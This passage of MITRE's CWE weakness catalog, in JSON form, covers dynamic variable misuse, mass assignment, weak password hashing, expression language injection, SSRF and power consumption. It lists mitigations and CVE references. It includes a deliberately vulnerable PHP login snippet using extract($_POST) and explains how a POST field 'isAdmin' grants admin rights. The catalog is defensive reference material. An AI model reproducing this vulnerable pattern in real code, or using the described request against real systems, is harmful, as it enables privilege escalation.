Variables","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly restrict reading from or writing to dynamically-identified variables.","Extended_Description":"Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of internal program variables that are allowed to be modified."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that internal program variables do not need to be dynamically identified."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-107"},"Intro_Text":"This code uses the credentials sent in a POST request to login a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($user,$pass){}$isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass));","xhtml:i":"//Log user in, and set $isAdmin to true if user is an administrator","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == \\"Admin\\"){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value \\"isAdmin\\" equal to \\"true\\", thus gaining Admin privileges."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7135","Description":"extract issue enables file inclusion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135"},{"Reference":"CVE-2006-7079","Description":"extract used for register_globals compatibility layer, enables path traversal","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079"},{"Reference":"CVE-2007-0649","Description":"extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649"},{"Reference":"CVE-2006-6661","Description":"extract() enables static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661"},{"Reference":"CVE-2006-2828","Description":"import_request_variables() buried in include files makes post-disclosure analysis confusing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828"},{"Reference":"CVE-2009-0422","Description":"Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422"},{"Reference":"CVE-2007-2431","Description":"Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431"},{"Reference":"CVE-2006-4904","Description":"Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904"},{"Reference":"CVE-2006-4019","Description":"Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"915":{"attr":{"@_ID":"915","@_Name":"Improperly Controlled Modification of Dynamically-Determined Object Attributes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.","Extended_Description":{"xhtml:p":["If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability.","This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"502","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Mass Assignment","Description":"\\"Mass assignment\\" is the name of a feature in Ruby on Rails that allows simultaneous modification of multiple object attributes."},{"Term":"AutoBinding","Description":"The \\"Autobinding\\" term is used in frameworks such as Spring MVC and ASP.NET MVC."},{"Term":"PHP Object Injection","Description":"Some PHP application researchers use this term for attacking unsafe use of the unserialize() function, but it is also used for CWE-502."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists.","For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment."]}},{"Phase":["Architecture and Design","Implementation"],"Description":"If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-2054","Description":"Mass assignment allows modification of arbitrary attributes using modified URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2054"},{"Reference":"CVE-2012-2055","Description":"Source version control product allows modification of trusted key using mass assignment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2055"},{"Reference":"CVE-2008-7310","Description":"Attackers can bypass payment step in e-commerce software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7310"},{"Reference":"CVE-2013-1465","Description":"Use of PHP unserialize function on untrusted input allows attacker to modify application configuration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465"},{"Reference":"CVE-2012-3527","Description":"Use of PHP unserialize function on untrusted input in content management system might allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527"},{"Reference":"CVE-2012-0911","Description":"Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2012-0911","Description":"Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2011-4962","Description":"Content management system written in PHP allows code execution through page comments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4962"},{"Reference":"CVE-2009-4137","Description":"Use of PHP unserialize function on cookie value allows remote code execution or upload of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4137"},{"Reference":"CVE-2007-5741","Description":"Content management system written in Python interprets untrusted data as pickles, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5741"},{"Reference":"CVE-2011-2520","Description":"Python script allows local users to execute code via pickled data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520"},{"Reference":"CVE-2005-2875","Description":"Python script allows remote attackers to execute arbitrary code using pickled objects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2875"},{"Reference":"CVE-2013-0277","Description":"Ruby on Rails allows deserialization of untrusted YAML to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0277"},{"Reference":"CVE-2011-2894","Description":"Spring framework allows deserialization of objects from untrusted sources to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2894"},{"Reference":"CVE-2012-1833","Description":"Grails allows binding of arbitrary parameters to modify arbitrary object properties.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1833"},{"Reference":"CVE-2010-3258","Description":"Incorrect deserialization in web browser allows escaping the sandbox.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3258"},{"Reference":"CVE-2008-1013","Description":"Media library allows deserialization of objects by untrusted Java applets, leading to arbitrary code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1013"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-885"}},{"attr":{"@_External_Reference_ID":"REF-886"}},{"attr":{"@_External_Reference_ID":"REF-887"}},{"attr":{"@_External_Reference_ID":"REF-888"}},{"attr":{"@_External_Reference_ID":"REF-889"}},{"attr":{"@_External_Reference_ID":"REF-890"}},{"attr":{"@_External_Reference_ID":"REF-891"}},{"attr":{"@_External_Reference_ID":"REF-892"}},{"attr":{"@_External_Reference_ID":"REF-893"}},{"attr":{"@_External_Reference_ID":"REF-894"}},{"attr":{"@_External_Reference_ID":"REF-464"}},{"attr":{"@_External_Reference_ID":"REF-466"}}]},"Notes":{"Note":{"#text":"The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Dan Amodio, Dave Wichers","Contribution_Organization":"Aspect Security","Contribution_Date":"2013-01-26","Contribution_Comment":"Suggested adding mass assignment, provided references, and clarified relationship with AutoBinding."}}},"916":{"attr":{"@_ID":"916","@_Name":"Use of Password Hash With Insufficient Computational Effort","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.","Extended_Description":{"xhtml:p":["Many password storage mechanisms compute a hash and store the hash, instead of storing the original password in plaintext. In this design, authentication involves accepting an incoming password, computing its hash, and comparing it to the stored hash.","Many hash algorithms are designed to execute quickly with minimal overhead, even cryptographic hashes. However, this efficiency is a problem for password storage, because it can reduce an attacker\'s workload for brute-force password cracking. If an attacker can obtain the hashes through some other method (such as SQL injection on a database that stores hashes), then the attacker can store the hashes offline and use various techniques to crack the passwords by computing hashes efficiently. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing (such as cloud computing) and GPU, ASIC, or FPGA hardware. In such a scenario, an efficient hash algorithm helps the attacker.","There are several properties of a hash scheme that are relevant to its strength against an offline, massively-parallel attack:","Note that the security requirements for the software may vary depending on the environment and the value of the passwords. Different schemes might not provide all of these properties, yet may still provide sufficient security for the environment. Conversely, a solution might be very strong in preserving one property, which still being very weak for an attack against another property, or it might not be able to significantly reduce the efficiency of a massively-parallel attack."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The amount of CPU time required to compute the hash (\\"stretching\\")","The amount of memory required to compute the hash (\\"memory-hard\\" operations)","Including a random value, along with the password, as input to the hash computation (\\"salting\\")","Given a hash, there is no known way of determining an input (e.g., a password) that produces this hash value, other than by guessing possible inputs (\\"one-way\\" hashing)","Relative to the number of all possible hashes that can be generated by the scheme, there is a low likelihood of producing the same hash for multiple different inputs (\\"collision resistance\\")"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If an attacker can gain access to the hashes, then the lack of sufficient computational effort will make it easier to conduct brute force attacks using techniques such as rainbow tables, or specialized hardware such as GPUs, which can be much faster than general-purpose CPUs for computing hashes."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1526","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526"},{"Reference":"CVE-2006-1058","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058"},{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2002-1657","Description":"Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657"},{"Reference":"CVE-2001-0967","Description":"Server uses a constant salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"55"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-908"}},{"attr":{"@_External_Reference_ID":"REF-909"}},{"attr":{"@_External_Reference_ID":"REF-633"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-28","Submission_Comment":"Created with input from members of the secure password hashing community."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"917":{"attr":{"@_ID":"917","@_Name":"Improper Neutralization of Special Elements used in an Expression Language Statement (\'Expression Language Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs all or part of an expression language (EL) statement in a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"EL Injection"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-911"}},{"attr":{"@_External_Reference_ID":"REF-912"}}]},"Notes":{"Note":{"#text":"In certain versions of Spring 3.0.5 and earlier, there was a vulnerability (CVE-2011-2730) in which Expression Language tags would be evaluated twice, which effectively exposed any application to EL injection. However, even for later versions, this weakness is still possible depending on configuration.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-02-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Dan Amodio, Dave Wichers","Contribution_Organization":"Aspect Security","Contribution_Date":"2013-02-15","Contribution_Comment":"Suggested adding this weakness and provided references."}}},"918":{"attr":{"@_ID":"918","@_Name":"Server-Side Request Forgery (SSRF)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.","Extended_Description":"By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://), or use other protocols such as gopher:// or tftp://, which may provide greater control over the contents of requests.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"441","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"XSPA","Description":"Cross Site Port Attack"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1484","Description":"Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484"},{"Reference":"CVE-2004-2061","Description":"CGI script accepts and retrieves incoming URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061"},{"Reference":"CVE-2010-1637","Description":"Web-based mail program allows internal network scanning using a modified POP3 port number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637"},{"Reference":"CVE-2009-0037","Description":"URL-downloading library automatically follows redirects to file:// and scp:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"664"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-913"}},{"attr":{"@_External_Reference_ID":"REF-914"}},{"attr":{"@_External_Reference_ID":"REF-915"}},{"attr":{"@_External_Reference_ID":"REF-916"}},{"attr":{"@_External_Reference_ID":"REF-917"}},{"attr":{"@_External_Reference_ID":"REF-918"}},{"attr":{"@_External_Reference_ID":"REF-919"}},{"attr":{"@_External_Reference_ID":"REF-920"}}]},"Notes":{"Note":{"#text":"CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the \\"Server\\" portion of the SSRF acronym does not necessarily apply.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-02-17"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"}]}},"920":{"attr":{"@_ID":"920","@_Name":"Improper Restriction of Power Consumption","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software operates in an environment in which power is a limited resource that cannot be automatically replenished, but the software does not properly restrict the amount of power that its operation consumes.","Extended_Description":{"xhtml:p":["In environments such as embedded or mobile devices, power can be a limited resource such as a battery, which cannot be automatically replenished by the software itself, and the device might not always be directly attached to a reliable power source. If the software uses too much power too quickly, then this could cause the device (and subsequently, the software) to stop functioning until power is restored, or increase the financial burden on the device owner because of increased power 